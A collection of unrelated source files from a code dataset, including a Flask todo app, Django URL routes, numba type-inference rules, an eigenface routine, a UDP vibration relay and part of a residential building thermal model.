+{"seq_id":"260938179","text":"#encoding: utf-8\nfrom OpenOrange import *\n\nParentSchedule = SuperClass(\"Schedule\",\"Record\",__file__)\nclass Schedule(ParentSchedule):\n \n def pasteTask(self):\n from UserTask import UserTask \n task = UserTask()\n task.SerNr = self.Task\n if (task.load()):\n self.TaskTitle = task.Title","sub_path":"standard/records/Schedule.py","file_name":"Schedule.py","file_ext":"py","file_size_in_byte":331,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"302744444","text":"# Copyright 2020 Dynatrace LLC\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport os\n\nimport requests\n\n\ndef test_environment_vars():\n assert \"DYNATRACE_URL\" in os.environ\n assert \"DYNATRACE_ACCESS_KEY\" in os.environ\n assert \"DEPLOYMENT_TYPE\" in os.environ\n assert \"TRAVIS_BUILD_ID\" in os.environ\n assert \"START_LOAD_GENERATION\" in os.environ\n assert \"END_LOAD_GENERATION\" in os.environ\n\n\ndef test_logs_on_dynatrace():\n url = f\"{os.environ.get('DYNATRACE_URL')}api/v2/logs/search\"\n params = {\n 'from': os.environ.get('START_LOAD_GENERATION'),\n 'to': os.environ.get('END_LOAD_GENERATION'),\n 'query': f\"TYPE: {os.environ.get('DEPLOYMENT_TYPE')}, BUILD: {os.environ.get('TRAVIS_BUILD_ID')}, INFO: This is sample app\"\n }\n headers = {\n 'Authorization': f\"Api-Token {os.environ.get('DYNATRACE_ACCESS_KEY')}\"\n }\n resp = requests.get(url, params=params, headers=headers)\n\n assert resp.status_code == 200\n assert len(resp.json()['results']) == 5\n","sub_path":"tests/e2e/logs/test_e2e.py","file_name":"test_e2e.py","file_ext":"py","file_size_in_byte":1553,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"504088001","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\nDefault rules for the typing of constants.\n\"\"\"\n\nfrom __future__ import print_function, division, absolute_import\n\nimport math\nimport types\nimport ctypes\nfrom functools import partial\n\nimport numba.typesystem\nfrom numba.typesystem import itypesystem, numpy_support\nfrom numba import numbawrapper\n\nfrom numba.support.ctypes_support import is_ctypes, from_ctypes_value\nfrom numba.support import 
cffi_support\n\nimport numpy as np\nimport datetime\n\n#------------------------------------------------------------------------\n# Class -> Type\n#------------------------------------------------------------------------\n\ndef get_typing_defaults(u):\n \"\"\"\n Get a simple table mapping Python classes to types.\n\n :param u: The type universe\n \"\"\"\n typing_defaults = {\n float: u.double,\n bool: u.bool_,\n complex: u.complex128,\n str: u.string_,\n #datetime.datetime: u.datetime,\n np.datetime64: u.datetime(),\n np.timedelta64: u.timedelta(),\n }\n return typing_defaults\n\n#------------------------------------------------------------------------\n# Class -> pyval -> Type\n#------------------------------------------------------------------------\n\ndef get_default_typing_rules(u, typeof, promote):\n \"\"\"\n Get a table mapping Python classes to handlers (value -> type)\n\n :param u: The type universe\n \"\"\"\n\n table = {}\n def register(*classes):\n def dec(func):\n for cls in classes:\n table[cls] = lambda u, value: func(value)\n return func\n return dec\n\n @register(int, long)\n def type_int(value):\n if abs(value) < 1:\n bits = 0\n else:\n bits = math.ceil(math.log(abs(value), 2))\n\n if bits < 32:\n return u.int_\n elif bits < 64:\n return u.int64\n else:\n raise ValueError(\"Cannot represent %s as int32 or int64\", value)\n\n @register(np.ndarray)\n def type_ndarray(value):\n if isinstance(value, np.ndarray):\n dtype = numpy_support.map_dtype(value.dtype)\n return u.array(dtype, value.ndim)\n #is_c_contig=value.flags['C_CONTIGUOUS'],\n #is_f_contig=value.flags['F_CONTIGUOUS'])\n\n @register(tuple, list, dict)\n def type_container(value):\n assert isinstance(value, (tuple, list, dict))\n\n if isinstance(value, dict):\n key_type = type_container(value.keys())\n value_type = type_container(value.values())\n return u.dict_(key_type, value_type, size=len(value))\n\n if isinstance(value, tuple):\n container_type = u.tuple_\n else:\n container_type = u.list_\n\n if 0 < len(value) < 30:\n # Figure out base type if the container is not too large\n # base_type = reduce(promote, (typeof(child) for child in value))\n ty = typeof(value[0])\n if all(typeof(child) == ty for child in value):\n base_type = ty\n else:\n base_type = u.object_\n else:\n base_type = u.object_\n\n return container_type(base_type, size=len(value))\n\n register(np.dtype)(lambda value: u.numpy_dtype(numpy_support.map_dtype(value)))\n register(types.ModuleType)(lambda value: u.module(value))\n register(itypesystem.Type)(lambda value: u.meta(value))\n\n return table\n\ndef get_constant_typer(universe, typeof, promote):\n \"\"\"\n Get a function mapping values to types, which returns None if unsuccessful.\n \"\"\"\n typetable = get_typing_defaults(universe)\n handler_table = get_default_typing_rules(universe, typeof, promote)\n return itypesystem.ConstantTyper(universe, typetable, handler_table).typeof\n\n#------------------------------------------------------------------------\n# Constant matching ({ pyval -> bool : pyval -> Type })\n#------------------------------------------------------------------------\n\n# TODO: Make this a well-defined (easily overridable) matching table\n# E.g. 
{ \"numpy\" : { is_numpy : get_type } }\n\ndef is_dtype_constructor(value):\n return isinstance(value, type) and issubclass(value, np.generic)\n\ndef is_numpy_scalar(value): \n return isinstance(value, np.generic)\n\ndef is_registered(value):\n from numba.type_inference import module_type_inference\n return module_type_inference.is_registered(value)\n\ndef from_ctypes(value, u):\n result = from_ctypes_value(value)\n if result.is_function:\n pointer = ctypes.cast(value, ctypes.c_void_p).value\n return u.pointer_to_function(value, pointer, result)\n else:\n return result\n\ndef from_cffi(value, u):\n signature = cffi_support.get_signature(value)\n pointer = cffi_support.get_pointer(value)\n return u.pointer_to_function(value, pointer, signature)\n\ndef from_typefunc(value, u):\n from numba.type_inference import module_type_inference\n result = module_type_inference.module_attribute_type(value)\n if result is not None:\n return result\n else:\n return u.known_value(value)\n\nis_numba_exttype = lambda value: hasattr(type(value), '__numba_ext_type')\nis_NULL = lambda value: value is numba.NULL\nis_autojit_func = lambda value: isinstance(\n value, numbawrapper.NumbaSpecializingWrapper)\n\ndef get_default_match_table(u):\n \"\"\"\n Get a matcher table: { (type -> bool) : (value -> type) }\n \"\"\"\n table = {\n is_NULL:\n lambda value: numba.typesystem.null,\n is_dtype_constructor:\n lambda value: numba.typesystem.from_numpy_dtype(np.dtype(value)),\n is_numpy_scalar:\n lambda value: numpy_support.map_dtype(value.dtype),\n is_ctypes:\n lambda value: from_ctypes(value, u),\n cffi_support.is_cffi_func:\n lambda value: from_cffi(value, u),\n is_numba_exttype:\n lambda value: getattr(type(value), '__numba_ext_type'),\n numbawrapper.is_numba_wrapper:\n lambda value: u.jit_function(value),\n is_autojit_func:\n lambda value: u.autojit_function(value),\n is_registered:\n lambda value: from_typefunc(value, u),\n }\n\n return table\n\ndef find_match(matchtable, value):\n for matcher, typefunc in matchtable.iteritems():\n if matcher(value):\n result = typefunc(value)\n assert result is not None\n return result\n\n return None\n\n#------------------------------------------------------------------------\n# Typeof\n#------------------------------------------------------------------------\n\ndef object_typer(universe, value):\n return universe.object_\n\ndef find_first(callables, value):\n for callable in callables:\n result = callable(value)\n if result is not None:\n return result\n\n assert False, (callables, value)\n\ndef get_default_typeof(universe, promote):\n typeof1 = get_constant_typer(universe, lambda value: typeof(value), promote)\n typeof2 = partial(find_match, get_default_match_table(universe))\n typeof3 = partial(object_typer, universe)\n typeof = partial(find_first, [typeof1, typeof2, typeof3])\n return typeof\n","sub_path":"oldnumba/typesystem/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":7168,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"158615784","text":"import numpy as np\n\nfrom const import *\n\n\n__author__ = \"Joseph, Fernando\"\n\n\ndef eigenfaces(faces, num_eigenfaces):\n \"\"\" Given a set of face vectors (faces), compute the eigenfaces -\n\n a set of the most important (associated with the highest eigenvalues)\n eigenvectors of the covariance matrix (AA^T). 
Also return the mean face.\n \"\"\"\n\n # Compute the mean.\n mean = face_mean(faces)\n\n # Calculate the difference from the mean for each face.\n diffs = []\n for face in faces:\n diff = face - mean\n diffs.append(diff)\n\n # Compute the normalized faces matrix.\n A = np.column_stack(diffs)\n\n # Compute (A transpose)(A), a matrix which will allow\n # us to find the eigenvectors of the covariance matrix.\n C = np.matmul(A.T, A)\n\n # Compute eigenvalues of (A transpose)(A).\n # Using eigh rather than eig is efficient when working with\n # a symmetric matrix.\n (eigen_values, eigen_vectors) = np.linalg.eigh(C)\n\n # eigen_vectors (matrix) contains one in each column, but iteration\n # happens, by default, through the rows. So we should transpose\n # the matrix before continuing.\n combined = list(zip(eigen_vectors.T, eigen_values))\n combined.sort(key=lambda t: t[1], reverse=True)\n combined_best = combined[0:num_eigenfaces]\n eigen_vectors_best = [t[0] for t in combined_best]\n\n # Compute best eigenvectors of (A)(A transpose).\n # These will be our eigenfaces.\n eigen_faces = []\n for eigen_vector in eigen_vectors_best:\n eigen_face_scaled = A.dot(eigen_vector)\n eigen_face = eigen_face_scaled / np.linalg.norm(eigen_face_scaled)\n eigen_faces.append(eigen_face)\n\n return mean, eigen_faces\n\n\ndef face_mean(faces):\n mean = np.zeros(IMG_SIZE).flatten()\n for face in faces:\n mean = np.add(mean, face)\n mean /= len(faces)\n\n return mean\n\n\ndef face_class(mean, basis, faces):\n # Find coords of each normalize face w/r/t\n # the eigenfaces.\n fclass = np.zeros(basis.shape[0]).flatten()\n for face in faces:\n diff = face - mean\n coords = basis.dot(diff)\n\n fclass += coords\n fclass /= len(faces)\n\n return fclass\n\n\ndef reconstruct(mean, basis, coords):\n res = np.matmul(coords, basis)\n res += mean\n return res\n","sub_path":"compute.py","file_name":"compute.py","file_ext":"py","file_size_in_byte":2272,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"32949555","text":"import socket as s\nimport os, time, sys\nimport errno\nimport Network as Network\n\ndur = 0.02\n\nif __name__ == '__main__':\n\n ip_recv = \"192.168.1.102\"\n port_recv = 5005\n\n receiver = Network.UDP_Receiver(ip_recv, port_recv)\n\n ip_send = \"192.168.1.104\"\n port_send = 5005\n\n sender = Network.UDP_Sender(ip_send, port_send)\n\n print('sending ...')\n\n while 1: # loop forever\n # data, addr = sock.recvfrom(1024) # wait to receive data\n data, addr = receiver.recv()\n # print(data)\n sample = (data.replace('{', '').replace('}', '').replace(' ', '').split(','))\n # print(sample)\n\n if (\"'SHZ'\") in sample:\t#removes 'SHZ' from the received data\n sample.remove(\"'SHZ'\")\n\n initial_time = float(sample.pop(0))\n\n for i in range(len(sample)):\n ts = initial_time + i * dur\n\n try:\n send_vib = 'vib:%.3f %s|' % (ts, sample[i])\n sender.send(send_vib)\n\n # pipe_write(pipe_out, send_vib)\n\n print('Writer) wrote: %s' % send_vib)\n\n # file.write(send_vib[4:-1] +'\\n')\n\n except OSError as err:\n\n if err.errno == 32:\n # send_vib = None\n sys.exit(0)\n else:\n raise err\n\n","sub_path":"vibration_udp_send.py","file_name":"vibration_udp_send.py","file_ext":"py","file_size_in_byte":1388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"245625901","text":"from flask import Flask, render_template, request, redirect, url_for, flash, jsonify\nfrom flask_sqlalchemy import SQLAlchemy\nfrom datetime import 
datetime\n\napp = Flask(__name__)\napp.secret_key = b'_5#y2L\"F4Q8z\\n\\xec]/'\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///test_flask.db'\ndb = SQLAlchemy(app)\n\nclass Todo(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n content = db.Column(db.String(200), nullable=False)\n date_created = db.Column(db.DateTime, default=datetime.utcnow)\n\n def __repr__(self):\n return '' % self.id\n\n\n@app.route('/', methods=['GET', 'POST'])\ndef index():\n if request.method == 'POST':\n task_content = request.form['content']\n if not task_content:\n flash('You must enter some content!')\n return redirect(url_for('index'))\n\n new_task = Todo(content=task_content)\n\n try:\n db.session.add(new_task)\n db.session.commit()\n flash('Your task has been added!')\n return redirect(url_for('index'))\n except:\n db.session.rollback()\n flash('There was an issue adding your task')\n return redirect(url_for('index'))\n else:\n tasks = Todo.query.order_by(Todo.date_created.desc()).all()\n return render_template('index.html', tasks=tasks)\n\n\n@app.route('/update/', methods=['GET', 'POST'])\ndef update(id):\n task = Todo.query.get_or_404(id)\n if request.method == 'POST':\n task.content = request.form['content']\n try:\n db.session.commit()\n flash('Task Updated')\n return redirect(url_for('index'))\n # return redirect('/')\n except:\n db.session.rollback()\n flash('There was an issue updating the task')\n return redirect(url_for('update'))\n # return 'There was an issue updating the task'\n else:\n return render_template('update.html', task=task)\n\n\n@app.route('/delete/')\ndef delete(id):\n task = Todo.query.get_or_404(id)\n if not task:\n # return 'No task found'\n flash('No task found')\n return redirect(url_for('index'))\n try:\n db.session.delete(task)\n db.session.commit()\n flash('Task deleted successfully')\n return redirect(url_for('index'))\n # return redirect('/')\n except:\n db.session.rollback()\n flash('There was an issue deleting the task')\n return redirect(url_for('index'))\n # return 'There was an issue deleting the task'\n\n\nif (__name__ == '__main__'):\n app.run(debug=True)","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2611,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"331781459","text":"from django.urls import path\nfrom . 
import views\n\napp_name = \"cisco1\"\nurlpatterns = [\n path('', views.IndexView.as_view(), name='index'),\n path('login/', views.UserLoginView.as_view(), name='login'),\n path('userlist/', views.UserView.as_view(), name='user'),\n path('certAdminView/', views.CertAdminView.as_view(), name='certAdminView'),\n path('certAdminAdd/', views.CertAdminAction.as_view(), name='certAdminAction'),\n path('trainingAdminAdd/', views.TrainingAdminAction.as_view(), name='trainingAdminAdd'),\n path('details/', views.MoreDetails, name='moreDetails'),\n path('groupadd/', views.GroupAdd.as_view(), name='groupAdd'),\n path('addGroupmember///', views.AddGroupMember.as_view(), name='addGroupMember'),\n path('certAdd/', views.CertAddView.as_view(), name='certAdd'),\n path('viewUser/', views.UserList.as_view(), name='view'),\n path('userUpdate/', views.UserUpdate.as_view(),name='userupdate'),\n path('mgrdown/', views.ManagerDown.as_view(), name='mgrdown'),\n path('trainingAdd/', views.TrainingAddView.as_view(), name='trainingAdd'),\n path('managerview/', views.ManagerView.as_view(), name='managerView'),\n path('trainingDetail//', views.TrainingDetail.as_view(), name='trainingDetail'),\n path('certDetail//', views.certDetail.as_view(), name='certDetail'),\n path('verifyAdmin/', views.VerifyAdmin.as_view(), name='verifyAdmin'),\n path('trainingaction///', views.TrainingAction.as_view(), name='trainingAction'),\n path('certaction///', views.CertAction.as_view(), name='certAction'),\n path('peopleadminview/', views.PeopleAdminView.as_view(), name='peopleAdminView'),\n path('userAdd/', views.UserADD.as_view(), name='userAdd'),\n path('peoplegroup//', views.PeopleGroupAction.as_view(), name=\"peopleGroupAction\"),\n path('success/', views.SuccessView.as_view(), name='success'),\n path('error/', views.ErrorView.as_view(), name='error'),\n path('logout/', views.user_logout, name='logout'),\n path('mgrajax/', views.managerTree, name='mgrajax'),\n path('certajax/', views.load_ctypes, name='certajax'),\n path('trainingajax/', views.load_ttypes, name='trainingajax'),\n path('dir/',views.dir),\n path(\"tracking/\",views.CCIEtrackingView.as_view(),name=\"tracking\"),\n path('getReportline/', views.getReportline, name='certajax'),\n]","sub_path":"cisco1/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2462,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"388857194","text":"'''\nGiven an integer array, determine whether there are two distinct indices i and j in the array such that the absolute difference between nums[i] and nums[j] is at most t, and the absolute difference between i and j is at most k.\n\nInput: nums = [1,2,3,1], k = 3, t = 0\nOutput: true\n'''\n\n\ndef contains_duplicate(nums, k, t):\n i = 0\n j = len(nums) - 1\n bok = False\n while i != j:\n if j - i < k:\n i += 1\n j = len(nums) - 1\n elif j - i > k:\n j -= 1\n else:\n if abs(nums[i] - nums[j]) == t:\n bok = True\n break\n else:\n j = len(nums) - 1\n i += 1\n return bok\n\nprint(contains_duplicate([1,2,3,1], 3, 0))\nprint(contains_duplicate([1,0,1,1], 1, 2))\nprint(contains_duplicate([1,5,9,1,5,9], 2, 3))","sub_path":"code_pratice/sort/contains_duplicate.py","file_name":"contains_duplicate.py","file_ext":"py","file_size_in_byte":811,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"526702455","text":"'''\n./HOUSE.py \nModule for House model\nAuthor: Ryan Tulabing\nProject: Local Demand Control\nInstitution: University of Auckland\nYear: 2017\n'''\n\n \n#---import python packages---\n# from pylab import *\nimport random\nimport datetime, time\nimport threading, 
queue\nimport numpy as np\nfrom scipy.integrate import odeint\nfrom multiprocessing import Pool, Queue, cpu_count\nimport multiprocessing\nimport pandas as pd\n# import sqlite3 as lite\n\n# for multicast\nimport socket\nimport struct\nimport sys\nimport json\nimport ast\n# for driving serial interface\n# import serial\n#---import local packages---\nimport MULTICAST\nimport DER, solar\nimport TCL\n\n\n#multiprocessing.Process\nclass House():\n 'Common base class for all residential buildings'\n # Attributes\n houseCount = 0\n\n \n def __init__(self, name, phase, clock, latitude, longitude, elevation, albedo, roofTilt,\\\n azimuth,floorArea, aspectRatio, ceilingHeight, windowWallRatio, windowRoofRatio,\\\n coeffWindowTransmission, glazingSHGC, Rroof, Rfloor, Rwindow, airDensity, airHeatCapacity, \\\n massQexFraction, massQinFraction, thermalMassPerArea, coeffInternalSurface, schedule_skew,\\\n hourlyAirChange, installedLights, installedAppliance, utilization, occupancy, \\\n mcast_ip_local, mcast_port_local, mcast_ip_global, mcast_port_global):\n \n # multiprocessing.Process.__init__(self)\n # self.daemon = True\n\n House.houseCount += 1\n self.name = name\n self.loadType = 'baseload'\n self.phase = phase\n self.clock = clock\n self.latitude = latitude\n self.longitude = longitude\n self.elevation = elevation\n self.albedo = albedo\n self.roofTilt = roofTilt\n self.azimuth = azimuth\n self.floorArea = floorArea\n self.ceilingHeight = ceilingHeight\n self.volume = floorArea * ceilingHeight\n self.aspectRatio = aspectRatio\n self.windowWallRatio = windowWallRatio\n self.windowRoofRatio = windowRoofRatio\n self.coeffWindowTransmission = coeffWindowTransmission\n self.glazingSHGC = glazingSHGC\n self.Rroof = Rroof\n self.Rfloor = Rfloor\n self.Rwindow = Rwindow\n self.airDensity = airDensity\n self.airHeatCapacity = airHeatCapacity\n self.massQexFraction = massQexFraction\n self.massQinFraction = massQinFraction\n self.thermalMassPerArea = thermalMassPerArea\n self.coeffInternalSurface = coeffInternalSurface\n self.schedule_skew = schedule_skew\n self.hourlyAirChange = hourlyAirChange\n \n self.width = (floorArea/aspectRatio)**0.5\n self.length = aspectRatio * self.width\n self.wallArea0 = self.width * self.ceilingHeight\n self.wallArea1 = self.width * self.ceilingHeight\n self.wallArea2 = self.length * self.ceilingHeight\n self.wallArea3 = self.length * self.ceilingHeight\n self.totalWallArea = self.wallArea0 + self.wallArea1 + self.wallArea2 + self.wallArea3\n self.totalWindowArea = self.totalWallArea * windowWallRatio\n\n self.roofArea = 0.0\n self.internalSurface = 0.0\n self.Ua = 0.0\n self.Um = 0.0\n self.Ca = 0.0\n self.Cm = 0.0\n self.heatingRate = TCL.get_heatingRate(floorArea)\n self.coolingRate = TCL.get_coolingRate(floorArea)\n self.installedPV = 0.0\n self.installedWind = 0.0\n self.irradiance = 0.0\n self.wallSolarIrradiance0 = 0.0\n self.wallSolarIrradiance1 = 0.0\n self.wallSolarIrradiance2 = 0.0\n self.wallSolarIrradiance3 = 0.0\n self.lightingLoad = 0.0\n self.applianceLoad = 0.0\n self.occupancy = 0.0\n self.occupancyLoad = 0.0\n self.occupancyFactor = 0.0\n self.applianceFactor = 0.0\n self.timestamp = self.clock.timestamp\n self.To = 0.0 # outside temperature\n self.Ta = 0.0 # inside temperature\n self.humidity = 0.0\n self.windSpeed = 0.0\n self.pressure = 0.0\n\n # calculating the U and thermal mass\n # https://www.thenbs.com/knowledge/what-is-a-u-value-heat-loss-thermal-mass-and-online-calculators-explained\n \n self.roofArea = floorArea / 
np.cos(np.radians(self.roofTilt))\n self.internalSurface = ((self.totalWallArea * (1-self.windowWallRatio)) + (self.roofArea * (1-self.windowRoofRatio)) + self.floorArea) \n \n self.Ua = (floorArea/Rfloor) + (self.roofArea/Rroof) + (((self.totalWindowArea) + (self.roofArea*windowRoofRatio)) / Rwindow) + ((self.totalWallArea - self.totalWindowArea)/Rfloor) # W/K note: Rfloor = Rwall\n self.Um = self.internalSurface * coeffInternalSurface * massQexFraction * massQinFraction / Rfloor # W/K\n self.Ca = airHeatCapacity * self.volume * self.airDensity # J/K\n self.Cm = self.internalSurface * thermalMassPerArea # J/K\n\n self.installedLights = installedLights\n self.installedAppliance = installedAppliance\n self.utilization = utilization\n self.occupancy = occupancy\n \n\n # collection of loads\n self.loads = []\n self.generators = [] # local generator, e.g., solar and wind\n\n # create common file for proposed demand and actual demand\n self.df_proposedDemand = pd.DataFrame()\n self.df_actualDemand = pd.DataFrame()\n self.proposedDemand = 0\n self.actualDemand = 0\n self.ourLimit = 5000\n self.housePower = 5000\n\n # ldc command storage\n self.ldc_signal = 860\n self.ldc_command = 1.0\n self.algorithm = 'A1'\n self.q_ldc = queue.Queue(maxsize=3)\n self.dict_command = {self.algorithm: self.ldc_signal}\n\n \n # history \n self.timeHistory = []\n self.flexibilityHistory = []\n self.proposedDemandHistory = []\n self.actualDemandHistory = []\n\n # declare queue's and dict holders for proposed and actual demand\n self.q_proposedDemand = queue.Queue(maxsize=3)\n self.q_actualDemand = queue.Queue(maxsize=3)\n self.q_state = queue.Queue(maxsize=3)\n self.dict_proposedDemand = {}\n self.dict_actualDemand = {}\n self.dict_state = {}\n\n # multicasting parameters\n self.mcast_ip_local = mcast_ip_local\n self.mcast_port_local = mcast_port_local\n self.mcast_ip_global = mcast_ip_global\n self.mcast_port_global = mcast_port_global\n \n # initial run of updating the data\n self.update_data()\n\n \n # run in the background\n thread1 = threading.Thread(target=self.step, args=())\n thread1.daemon = True # Daemonize thread\n thread1.start() \n\n time.sleep(3)\n \n thread = threading.Thread(target=self.receive_mcast, args=())\n thread.daemon = True # Daemonize thread\n thread.start() \n \n thread2 = threading.Thread(target=self.receive_mcast_global, args=())\n thread2.daemon = True # Daemonize thread\n thread2.start() \n \n print(\"Running...\", self.name)\n\n\n # Methods\n def displayCount(self):\n print(\"Total houses %d\" % House.houseCount)\n\n def displayHouseData(self):\n print(\"Name : \", self.name)\n print(\"Floor Area: \", self.floorArea)\n print(\"Aspect Ratio: \", self.aspectRatio)\n print(\"Floor Height: \", self.ceilingHeight)\n print(\"Window Wall Ratio: \", self.windowWallRatio)\n print(\"Window Roof Ratio: \", self.windowRoofRatio)\n print(\"Coefficient Window Heat Transmission: \", self.coeffWindowTransmission)\n print(\"Glazing SHGC: \", self.glazingSHGC)\n print(\"R-value Roof: \", self.Rroof)\n print(\"R-value Floor: \", self.Rfloor)\n print(\"R-value Window: \", self.Rwindow)\n print(\"Air Density: \", self.airDensity)\n print(\"Air Heat Capacity: \", self.airHeatCapacity)\n print(\"Mass External Heat Gain Fraction: \", self.massQexFraction)\n print(\"Mass Internal Heat Gain Fraction: \", self.massQinFraction)\n print(\"Thermal mass per floor Area: \", self.thermalMassPerArea)\n print(\"Coefficient Internal Heat Transffer: \", self.coeffInternalSurface)\n print(\"Hourly Air Change: \", 
self.hourlyAirChange)\n    \n    def displayETP(self):\n        print(\"Ua = \", self.Ua)\n        print(\"Um = \", self.Um)\n        print(\"Ca = \", self.Ca)\n        print(\"Cm = \", self.Cm)\n\n    @staticmethod\n    def read_csv(filename, failed=True):\n        # Continually try reading the csv until successful\n        while failed:\n            try:\n                df = pd.read_csv(filename, index_col='id')\n                failed = False\n            except Exception as e:\n                failed = True\n                print(\"Error in read_csv:\", e)  # a staticmethod has no self to report a house name\n        return df\n\n    @staticmethod\n    def populate(quantity, lowerlimit, upperlimit, average):\n        # This function creates a set of numbers in gaussian distribution\n        # representing the parameters of a certain load\n        from scipy import stats  # scipy.stats is not in the module imports, so import it locally\n        lower = lowerlimit\n        upper = upperlimit\n        mu = average\n        N = quantity\n        sigma = (((upper-mu)**2) + ((lower-mu)**2) )/2\n        value = stats.truncnorm.rvs((lower - mu)/sigma, (upper-mu)/sigma, loc=mu, scale=sigma, size = N)\n        return value\n\n    \n    def create_installedPV(self):\n        # This function creates a hypothetical size of installed rooftop PV\n        roofAreaForPV = self.floorArea * House.populate(1, 0.25, 0.85, 0.6) # assuming that available area for PV is 25%-85% of the floor area\n        self.installedPV = roofAreaForPV * 1000. / 10. # adopting the rule of thumb: 1000 watts per 10 m^2\n        return\n\n    def create_installedWind(self):\n        # This function creates a hypothetical size of installed wind in a house\n        self.installedWind = 400. # watts, based on most common micro wind turbine: http://cleantechnica.com/2008/03/21/the-five-best-micro-wind-turbines/2/\n\n    def get_solarIrradiance(self):\n        # This function predicts the solar irradiance received by the roof and the walls of a building\n        # get irradiance received by the wall windows using HDKR method\n        self.wallSolarIrradiance0 = solar.get_GtHDKR(time.localtime(float(self.timestamp)), float(self.latitude), float(self.longitude), \\\n            float(self.elevation), 90., float(self.azimuth), float(self.albedo), float(self.humidity)) #\n\n        self.wallSolarIrradiance1 = solar.get_GtHDKR(time.localtime(float(self.timestamp)), float(self.latitude), float(self.longitude), \\\n            float(self.elevation), 90., float(self.azimuth) + 90., float(self.albedo), float(self.humidity)) #\n\n        self.wallSolarIrradiance2 = solar.get_GtHDKR(time.localtime(float(self.timestamp)), float(self.latitude), float(self.longitude), \\\n            float(self.elevation), 90., float(self.azimuth) - 90., float(self.albedo), float(self.humidity)) #\n        \n        self.wallSolarIrradiance3 = solar.get_GtHDKR(time.localtime(float(self.timestamp)), float(self.latitude), float(self.longitude), \\\n            float(self.elevation), 90., float(self.azimuth) + 180., float(self.albedo), float(self.humidity)) #\n\n        # for irradiance received by the rooftop using HDKR method\n        self.irradiance = solar.get_GtHDKR(time.localtime(float(self.timestamp)), float(self.latitude), float(self.longitude), \\\n            float(self.elevation), float(self.roofTilt), float(self.azimuth), float(self.albedo), float(self.humidity)) #\n        \n    \n    def get_lightingLoad(self):\n        # This function predicts lighting consumption within a building, residential\n        # Regression function used is based on the TMY data for residential load\n        t = self.clock.inHours + self.schedule_skew\n        lightingFactor = 0.0\n\n        if t <= 4.:\n            lightingFactor = -0.03*t + 0.17\n        elif 4. < t <= 8.:\n            lightingFactor = 0.0561*(t-4) + 0.039\n        elif 8. < t <= 12.:\n            lightingFactor = -0.053*(t-8) + 0.36\n        elif 12. < t <= 16.:\n            lightingFactor = -0.0082*(t-12) + 0.11\n        elif 16. < t <= 20.:\n            lightingFactor = 0.174*(t-16)\n        elif 20 < t:\n            lightingFactor = -0.12*(t-20) + 0.93\n\n        self.lightingLoad = self.installedLights * self.utilization * lightingFactor\n        return self.lightingLoad\n
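# Aside: the piecewise lighting profile above, restated as a standalone helper so the
# regression can be sanity-checked at a few hours of the day. The coefficients are the
# ones visible in get_lightingLoad; the sample hours below are arbitrary.
def lighting_factor(t):
    if t <= 4.:
        return -0.03*t + 0.17
    elif t <= 8.:
        return 0.0561*(t-4) + 0.039
    elif t <= 12.:
        return -0.053*(t-8) + 0.36
    elif t <= 16.:
        return -0.0082*(t-12) + 0.11
    elif t <= 20.:
        return 0.174*(t-16)
    else:
        return -0.12*(t-20) + 0.93

if __name__ == '__main__':
    # e.g. lighting_factor(10) = -0.053*(10-8) + 0.36 = 0.254
    for hour in (2., 10., 18., 22.):
        print(hour, round(lighting_factor(hour), 3))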
def get_applianceLoad(self):\n        # This function predicts consumption of Urgent Non-TCL loads within a building, residential\n        # Regression function used is based on the TMY data for residential load\n        \n        t = self.clock.inHours + self.schedule_skew\n        \n        if t <= 4.:\n            self.applianceFactor = -0.0252*t + 0.488\n            self.occupancyFactor = (-0.0252*t + 0.488)\n        elif 4. < t <= 8.:\n            self.applianceFactor = 0.0745*(t-4) + 0.2742\n            self.occupancyFactor = 0.0745*(t-4) + 0.2742\n        elif 8. < t <= 12.:\n            self.applianceFactor = -0.0179*(t-8) + 0.652\n            self.occupancyFactor = -0.0179*(t-8) + 0.652\n        elif 12. < t <= 16.:\n            self.applianceFactor = -0.0096*(t-12) + 0.7427\n            self.occupancyFactor = -0.0096*(t-12) + 0.7427\n        elif 16. < t <= 20.:\n            self.applianceFactor = 0.0662*(t-16) + 0.709\n            self.occupancyFactor = 0.0662*(t-16) + 0.709\n        elif 20 < t:\n            self.applianceFactor = -0.085*(t-20) + 1.09\n            self.occupancyFactor = -0.085*(t-20) + 1.09\n\n\n        self.occupancyLoad = self.occupancyFactor * self.occupancy * 0.5\n        self.applianceLoad = self.installedAppliance * self.utilization * self.applianceFactor\n\n        return self.applianceLoad\n\n    def update_data(self):\n        # This function updates the time varying data of the house\n        self.timestamp = self.clock.timestamp\n        cmd = {\"W\":str(self.timestamp)}\n        count = 0\n        while count < 5:\n            try:\n                dict_weather = MULTICAST.send(cmd, ip=self.mcast_ip_global, port=self.mcast_port_global)\n\n                dict_weather = dict_weather[\"weather\"]\n                self.To = dict_weather[\"To\"]\n                self.humidity = dict_weather[\"humidity\"]\n                self.windSpeed = dict_weather[\"windSpeed\"]\n                break\n            except Exception as e:\n                count += 1\n        \n        # # fetch new weather data if current buffer is used up\n        # if self.timestamp >= int(self.outsideConditions.df_weather['unixtime'].tail(1)):\n        #     